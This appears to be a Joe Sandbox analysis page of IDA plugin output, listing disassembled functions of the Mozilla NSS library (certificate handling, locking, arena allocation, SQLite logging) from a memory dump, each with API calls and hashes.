Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 9ea67719db040c3339dd1a092b40026f33532db08f98b453afd983175a4bfce2
Instruction ID: 55346b9e0df084bc82f1975b4f9a21bcd27cfd1d49ab0f02afc30364d997c9a2
Opcode Fuzzy Hash: 9ea67719db040c3339dd1a092b40026f33532db08f98b453afd983175a4bfce2
Instruction Fuzzy Hash: B25172B4A04706DFDB00EF69C89465ABFF0BF55358F158969D858ABB10DB30E844CB91

Function 6C6B9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6B9EC0
EnterCriticalSection.KERNEL32(?), ref: 6C6B9EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9F73
EnterCriticalSection.KERNEL32(?), ref: 6C6B9FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C6B9FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BA01D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: f3803e78985fb4697620a314b44d156b759342ec3df78c74381ddb28840879fc
Instruction ID: a06c48948acef8704b149bdf53e7507f52924f8963ff74cbfa450854e3ac2be0
Opcode Fuzzy Hash: f3803e78985fb4697620a314b44d156b759342ec3df78c74381ddb28840879fc
Instruction Fuzzy Hash: E451B1B2800600DBCB209F26D48468AB7F4FF1531CF158569DC5967F12E731E895CB9A

Function 6C5ADCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C5ADCFA

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5ADD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C5ADD62
CERT_DestroyCertificate.NSS3(?), ref: 6C5ADD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5ADD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C5ADD8F

Part of subcall function 6C5C06A0: TlsGetValue.KERNEL32 ref: 6C5C06C2
Part of subcall function 6C5C06A0: EnterCriticalSection.KERNEL32(?), ref: 6C5C06D6
Part of subcall function 6C5C06A0: PR_Unlock.NSS3 ref: 6C5C06EB

CERT_DestroyCertificate.NSS3(?), ref: 6C5ADD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C5ADDB7

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 3f88037778a0471e443844dcabde4fac64d70294ae52d70788e303da06809fee
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: BF218EB6E011299BDB01AEE6DC4199EB7B4AF49318B140424EC18A7711F732ED16CBE2

Function 6C635F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635F72

Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59ED8F
Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59ED9E
Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FCC
free.MOZGLUE(?,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FF4
free.MOZGLUE(?,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C636019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C636036

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 0da901879d0c1782432b7bcba4afe73c0b336fc0f6ceab3180c8b4f3f65f65dd
Instruction ID: b882012fed6bf591d1d21534a01dfda5fdc2df58eed261c8b8ebcccd0fb04371
Opcode Fuzzy Hash: 0da901879d0c1782432b7bcba4afe73c0b336fc0f6ceab3180c8b4f3f65f65dd
Instruction Fuzzy Hash: F62138F1604B40ABEB209F75AC48BD376A8BB41708F14182CE46E87640EB76F419CBD5

Function 6C5A3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C61460B,?,?), ref: 6C5A3CA9
EnterCriticalSection.KERNEL32(?), ref: 6C5A3CB9
PL_HashTableLookup.NSS3(?), ref: 6C5A3CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C5A3CD6
PR_Unlock.NSS3 ref: 6C5A3CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C5A3CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A3D03
PR_Unlock.NSS3 ref: 6C5A3D15

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 1727b34826c23fc70677f7f76ed06021fd3598228e90ef9766dab0ce46b113d5
Instruction ID: 5d0b7633bcd0b89c741b36b4711cfe8a059c1c7158f220971d98f1e1572575c1
Opcode Fuzzy Hash: 1727b34826c23fc70677f7f76ed06021fd3598228e90ef9766dab0ce46b113d5
Instruction Fuzzy Hash: 92110ABAF00204F7DB012765EC458AA3B79EB4225CF148135ED1883B11FB21DC59C7D1

Function 6C5A9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C11C0: PR_NewLock.NSS3 ref: 6C5C1216

free.MOZGLUE(?), ref: 6C5A9E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A9E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A9E4E
TlsGetValue.KERNEL32 ref: 6C5A9EA2

Part of subcall function 6C5B9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C5B9546

EnterCriticalSection.KERNEL32(?), ref: 6C5A9EB6
PR_Unlock.NSS3 ref: 6C5A9ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C5A9F18

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 3f5ab2d852af29eb4caab83331b2f6182de3c41c506be4973dd320847d458f6f
Instruction ID: 43d6ce058538c60460a33195d5b052f482ab6bd050b5c451737a0c5b66fd6169
Opcode Fuzzy Hash: 3f5ab2d852af29eb4caab83331b2f6182de3c41c506be4973dd320847d458f6f
Instruction Fuzzy Hash: AF813AB5A00611ABE700DF75DC40AAFBBA9BF95248F04452CEC4587B42FB32EC55C7A1

Function 6C5BDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(D958E852,6C5C1397,5B5F5EC0,?,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB3C
Part of subcall function 6C5BAB10: free.MOZGLUE(D958E836,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB49
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(5D5E6C7B), ref: 6C5BAB5C
Part of subcall function 6C5BAB10: free.MOZGLUE(5D5E6C6F), ref: 6C5BAB63
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C5BAB6F
Part of subcall function 6C5BAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C5BAB76

TlsGetValue.KERNEL32 ref: 6C5BDCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C5BDD0E
PK11_IsFriendly.NSS3(?), ref: 6C5BDD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C5BDD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5BDE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5BDEA6
PR_Unlock.NSS3(?), ref: 6C5BDF08

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: fe585931a602beed7e519201205b0ffacb62a31567de022b181ccf12dbf9a4dc
Instruction ID: 102a6f6d8c93239d7a747dbdea014a10f95021b91bfdfb091fc5fe79f9d19e99
Opcode Fuzzy Hash: fe585931a602beed7e519201205b0ffacb62a31567de022b181ccf12dbf9a4dc
Instruction Fuzzy Hash: 8E91B3B5A001059FDB00CF68CCA1BAABFB5FF54308F148429ED19AB745E731E955CB92

Function 6C575FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C5760AB
sqlite3_config.NSS3(00000004,6C6C4CA4,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C5760EB
sqlite3_config.NSS3(00000012,6C6C4CC4,?,?,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C576122

Strings

%s at line %d of [%.10s], xrefs: 6C5760A4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C576095
misuse, xrefs: 6C57609F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: d6ed134730494dce77896e9d51a0da1d7cc31a3243f5b22365d5e01c1bad7f12
Instruction ID: 058a86e89faa3bf4cb8f3cb7bce89f73d5bda64c8af84771cc3b225136858391
Opcode Fuzzy Hash: d6ed134730494dce77896e9d51a0da1d7cc31a3243f5b22365d5e01c1bad7f12
Instruction Fuzzy Hash: 0AB17274E04746CFCB04CF59D6849A9BBF1FB1E304F018559D519AB322DB30AA94CFAA

Function 6C524F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C524FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5251BB

Strings

%s at line %d of [%.10s], xrefs: 6C5251B4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5251A5
misuse, xrefs: 6C5251AF
unable to delete/modify user-function due to active statements, xrefs: 6C5251DF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: c6525193d5744f3cfb57578c6f12aa99a68122ca96a4afc66f8c304e6b9a6fd1
Instruction ID: 7b5480a7db7041373d8d13ad70c372d14369b1084143cc18258abd80168b1d5f
Opcode Fuzzy Hash: c6525193d5744f3cfb57578c6f12aa99a68122ca96a4afc66f8c304e6b9a6fd1
Instruction Fuzzy Hash: 6E718CB1A0420A9BEB00CE55CCC0B9AB7F5BF88308F554524FD199BB89D739ED51CBA1

Function 6C60FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C60F165,6C6D219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C60FFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C6100A6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: ca2fa04a09369f2fdf9a6f7a8b88c95b191e13e16cf5dd8ddf39218f57c6a749
Instruction ID: e2e5704d58415acf9820125bcbf711dbdc5e9340b5dda53d8d21d52db4d63a30
Opcode Fuzzy Hash: ca2fa04a09369f2fdf9a6f7a8b88c95b191e13e16cf5dd8ddf39218f57c6a749
Instruction Fuzzy Hash: AD510475E082559FDF148E5CC8807AEB7B5BB4931AF254229DC59B7B40D332AC20CBD9

Function 6C5CDEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5CDF37
EnterCriticalSection.KERNEL32(?), ref: 6C5CDF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CDF96
PR_SetError.NSS3(00000000,00000000), ref: 6C5CE02B
PR_Unlock.NSS3(?), ref: 6C5CE07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5CE090
PR_Unlock.NSS3(?), ref: 6C5CE0AF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 4537f4c9af753d228240db55f0660875d1fbc15ae8b854d8473680e1729c9fb7
Instruction ID: 50f21a86a0f4f8d07c48ed38409ac9efd4356ac0d11ecd5739c5a4ad02d75e6b
Opcode Fuzzy Hash: 4537f4c9af753d228240db55f0660875d1fbc15ae8b854d8473680e1729c9fb7
Instruction Fuzzy Hash: 7051CC70B00600DBEB20DEA8DC86B5673B5FB45308F20492CE85A97B91D7B1E848CBD3

Function 6C5CBCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C5CBD1E

Part of subcall function 6C5A2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C5A2F0A
Part of subcall function 6C5A2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5A2F1D

Part of subcall function 6C5E57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C5AB41E,00000000,00000000,?,00000000,?,6C5AB41E,00000000,00000000,00000001,?), ref: 6C5E57E0
Part of subcall function 6C5E57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5E5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5CBD8C

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C5CBD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C5CBDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBE3A

Part of subcall function 6C5A3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
Part of subcall function 6C5A3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6
Part of subcall function 6C5A3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE
Part of subcall function 6C5A3E60: PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
Part of subcall function 6C5A3E60: PL_FreeArenaPool.NSS3 ref: 6C5A3F14
Part of subcall function 6C5A3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBE52

Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E
Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33
Part of subcall function 6C5A2E00: TlsGetValue.KERNEL32 ref: 6C5A2E4E
Part of subcall function 6C5A2E00: EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
Part of subcall function 6C5A2E00: PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
Part of subcall function 6C5A2E00: PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
Part of subcall function 6C5A2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
Part of subcall function 6C5A2E00: PR_Unlock.NSS3 ref: 6C5A2EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5CBE61

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: ed18298941303ad518d65d8009dcca20a3575ac4581502c65dbd1658a2171d21
Instruction ID: db5e23c06650a48190cb5466075eda465423e6aea6f6242f6b612a2e5736e683
Opcode Fuzzy Hash: ed18298941303ad518d65d8009dcca20a3575ac4581502c65dbd1658a2171d21
Instruction Fuzzy Hash: E641C1B6A00210ABC710DFA9DC80B6A77E4EB89718F10456CF95997B11E731ED15CB93

Function 6C5EAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C5EAB3E,?,?,?), ref: 6C5EAC35

Part of subcall function 6C5CCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C5CCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C5EAB3E,?,?,?), ref: 6C5EAC55

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
